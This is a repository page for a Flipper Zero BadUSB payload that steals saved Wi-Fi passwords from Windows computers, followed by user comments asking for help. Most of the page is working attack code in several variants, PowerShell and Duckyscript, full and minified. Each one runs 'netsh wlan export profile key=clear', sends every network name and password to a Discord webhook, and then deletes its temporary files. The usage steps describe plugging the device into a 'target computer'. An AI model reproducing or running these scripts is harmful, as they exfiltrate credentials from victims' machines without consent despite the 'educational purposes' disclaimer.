Flipper Zero BadUSB - Wifi password stealer (Discord webhooks)

README.md

⚠️ This script was made for educational purposes only and is not meant to me used maliciously.

This script is a wifi stealer that sends every wifi passwords stored on a Windows 10/11 computer to a discord webhook.

It is made to be used with a Flipper Zero device, using the BadUSB feature.

Files

Powershell scripts

• Wifi-Stealer-Discord.ps1 - The main script, commented for readability
• Wifi-Stealer-Discord_minified.ps1 - The minified version of the script (no comments, one line)

Duckyscript files

• Wifi-Stealer-Discord.txt - A duckyscript version of the script, commented for readability
• Wifi-Stealer-Discord_(Any-keyboard-layout).txt - A duckyscript version of the script for any keyboard layout, commented for readability (for Flipper Zero)
• Wifi-Stealer-Discord_(One_line).txt - A duckyscript version of the script using the minified version of the script (for Flipper Zero)

Usage

Replace https://discord.com/api/webhooks/<channel_id>/<webhook_id> with your own webhook url.

Powershell

powershell -ExecutionPolicy Bypass -File Wifi-Stealer-Discord.ps1

Flipper Zero

1. Copy the .txt files to the Flipper Zero in the badusb folder, directly to the microSD card or using the Flipper Zero app (Android/iOS) or qFlipper (Windows/Linux/MacOS)
2. Plug the Flipper Zero to the target computer
3. Run the script from the Flipper Zero in the Bad USB menu

Result

Wifi-Stealer-Discord.ps1

# Create a temporary directory and change to it
$p = "$env:temp\wifi-passwords"; md $p >$null; cd $p;

# Export all wifi profiles to xml files in the current directory
netsh wlan export profile key=clear >$null;

# Parse the xml files and create a custom object with the name and password
$r = Get-ChildItem | ForEach-Object {
  $Xml = [xml](Get-Content -Path $_.FullName)
  [PSCustomObject]@{
    Name = $Xml.WLANProfile.Name
    Password = $Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial
  }
}

# Format the custom object as a table in a Markdown code block
$body = @{content = "``````"+($r | Format-Table | Out-String)+"``````"}

# Send the formatted table to a Discord webhook
Invoke-RestMethod -Uri 'https://discord.com/api/webhooks/<channel_id>/<webhook_id>' -Method 'post' -Body $body >$null;

# Delete the temporary directory and exit the script
cd ..; rm $p -r -fo; exit;

Wifi-Stealer-Discord.txt

REM This script is a ducky script to be run on a windows machine with a Flipper Zero
REM It contains a powershell script that exports all saved wifi passwords to a discord webhook
REM This script is for educational purposes only

REM This version of the script should work on any duckyscript compatible device
REM However, it was only tested on a Flipper Zero

REM Opening powershell from the run menu
    GUI r
    DELAY 500
    STRING powershell
    ENTER

REM Writing the powershell script
    REM delay of 2 seconds to make sure powershell is open
    DELAY 2000

    REM Creating a temporary directory and changing to it
    STRING $p="$env:temp\p";md $p >$null;cd $p;

    REM Exporting all saved wifi passwords to xml files in the temporary directory
    STRING netsh wlan export profile key=clear >$null;

    REM Getting the names and passwords of all the saved wifi networks from the xml files and storing them in a variable
    STRING $r=ls|%{$Xml=[xml](gc $_.FullName);[PSCustomObject]@{Name=$Xml.WLANProfile.Name;Password=$Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};

    REM Creating the body of the discord webhook message (the message is formatted as a Markdown code block to make it easier to read)
    STRING $body=@{content="``````"+($r|ft|Out-String)+"``````"};

    REM Sending the body to the discord webhook
    STRING curl -Uri 'https://discord.com/api/webhooks/<channel_id>/<webhook_id>' -Method post -Body $body >$null;

    REM Deleting the temporary directory and exiting powershell
    STRING cd ..;rm $p -r -fo;exit;

REM Running the powershell script
    ENTER

Wifi-Stealer-Discord_(Any-keyboard-layout).txt

REM This script is a ducky script to be run on a windows machine with a Flipper Zero
REM It contains a powershell script that exports all saved wifi passwords to a discord webhook
REM This script is for educational purposes only

REM This version of the script only works on the Flipper Zero
REM It uses ALTSTRING instead of STRING, which enters every character as an ALT+key combination, so it works for any keyboard layout
REM However, this version may be slower than the STRING version

REM Opening powershell from the run menu
    GUI r
    DELAY 500
    ALTSTRING powershell
    ENTER

REM Writing the powershell script
    REM delay of 2 seconds to make sure powershell is open
    DELAY 2000

    REM Creating a temporary directory and changing to it
    ALTSTRING $p="$env:temp\p";md $p >$null;cd $p;

    REM Exporting all saved wifi passwords to xml files in the temporary directory
    ALTSTRING netsh wlan export profile key=clear >$null;

    REM Getting the names and passwords of all the saved wifi networks from the xml files and storing them in a variable
    ALTSTRING $r=ls|%{$Xml=[xml](gc $_.FullName);[PSCustomObject]@{Name=$Xml.WLANProfile.Name;Password=$Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};

    REM Creating the body of the discord webhook message (the message is formatted as a Markdown code block to make it easier to read)
    ALTSTRING $body=@{content="``````"+($r|ft|Out-String)+"``````"};

    REM Sending the body to the discord webhook
    ALTSTRING curl -Uri 'https://discord.com/api/webhooks/<channel_id>/<webhook_id>' -Method post -Body $body >$null;

    REM Deleting the temporary directory and exiting powershell
    ALTSTRING cd ..;rm $p -r -fo;exit;

REM Running the powershell script
    ENTER

Wifi-Stealer-Discord_(One-line).txt

REM This script is a ducky script to be run on a windows machine with a Flipper Zero
REM It contains a powershell script that exports all saved wifi passwords to a discord webhook
REM This script is for educational purposes only

REM This version of the script only works on the Flipper Zero as it uses STRINGLN (STRING + ENTER)

REM Opening powershell from the run menu
    GUI r
    DELAY 500
    STRING powershell
    ENTER

REM Writing and running the powershell script
    REM delay of 2 seconds to make sure powershell is open
    DELAY 2000

    STRINGLN $p="$env:temp\p";md $p >$null;cd $p;netsh wlan export profile key=clear >$null;$r=ls|%{$Xml=[xml](gc $_.FullName);[PSCustomObject]@{Name=$Xml.WLANProfile.Name;Password=$Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};$body=@{content="``````"+($r|ft|Out-String)+"``````"};curl -Uri 'https://discord.com/api/webhooks/<channel_id>/<webhook_id>' -Method post -Body $body >$null;cd ..;rm $p -r -fo;exit;

Wifi-Stealer-Discord_minified.ps1

$p="$env:temp\p";md $p >$null;cd $p;netsh wlan export profile key=clear >$null;$r=ls|%{$Xml=[xml](gc $_.FullName);[PSCustomObject]@{Name=$Xml.WLANProfile.Name;Password=$Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};$body=@{content="``````"+($r|ft|Out-String)+"``````"};curl -Uri 'https://discord.com/api/webhooks/<channel_id>/<webhook_id>' -Method post -Body $body >$null;cd ..;rm $p -r -fo;exit;

Does this work on mac and windows?

Does this work on mac and windows?

It only works on Windows as it uses PowerShell

Im not sure what i did wrong but the webhook sent to my discord just this-> ``````

Im not sure what i did wrong but the webhook sent to my discord just this-> ``````

Updated it and made a working fork.

it does not work for me the code wont work for some reason

Can someone help me with the code?

Im not sure what i did wrong but the webhook sent to my discord just this-> ``````

Hi , i am having the same issue , have you been able to figure it out ?